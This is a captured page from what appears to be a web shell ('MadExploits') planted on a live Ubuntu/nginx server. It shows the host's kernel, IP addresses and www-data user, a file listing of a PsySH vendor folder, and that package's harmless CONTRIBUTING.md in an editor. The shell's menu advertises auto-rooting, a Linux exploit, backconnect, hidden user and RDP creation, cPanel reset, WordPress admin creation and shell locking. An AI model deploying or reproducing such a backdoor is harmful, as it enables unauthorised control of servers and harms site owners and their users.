Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
sdgamatya /
vendor /
psy /
psysh /
[ HOME SHELL ]
Name
Size
Permission
Action
.phan
[ DIR ]
drwxr-xr-x
bin
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
.editorconfig
200
B
-rw-r--r--
.gitignore
127
B
-rw-r--r--
.php_cs
1.13
KB
-rw-r--r--
.styleci.yml
355
B
-rw-r--r--
.travis.yml
791
B
-rw-r--r--
CONTRIBUTING.md
927
B
-rw-r--r--
LICENSE
1.08
KB
-rw-r--r--
README.md
1.93
KB
-rw-r--r--
composer.json
1.78
KB
-rw-r--r--
phpunit.xml.dist
331
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CONTRIBUTING.md
## Code style Please make your code look like the other code in the project. PsySH follows [PSR-1](http://php-fig.org/psr/psr-1/) and [PSR-2](http://php-fig.org/psr/psr-2/). The easiest way to do make sure you're following the coding standard is to run `vendor/bin/php-cs-fixer fix` before committing. ## Branching model Please branch off and send pull requests to the `develop` branch. ## Building the manual ```sh svn co https://svn.php.net/repository/phpdoc/en/trunk/reference/ php_manual bin/build_manual phpdoc_manual ~/.local/share/psysh/php_manual.sqlite ``` To build the manual for another language, switch out `en` above for `de`, `es`, or any of the other languages listed in the docs. [Partial or outdated documentation is available for other languages](http://www.php.net/manual/help-translate.php) but these translations are outdated, so their content may be completely wrong or insecure!
Close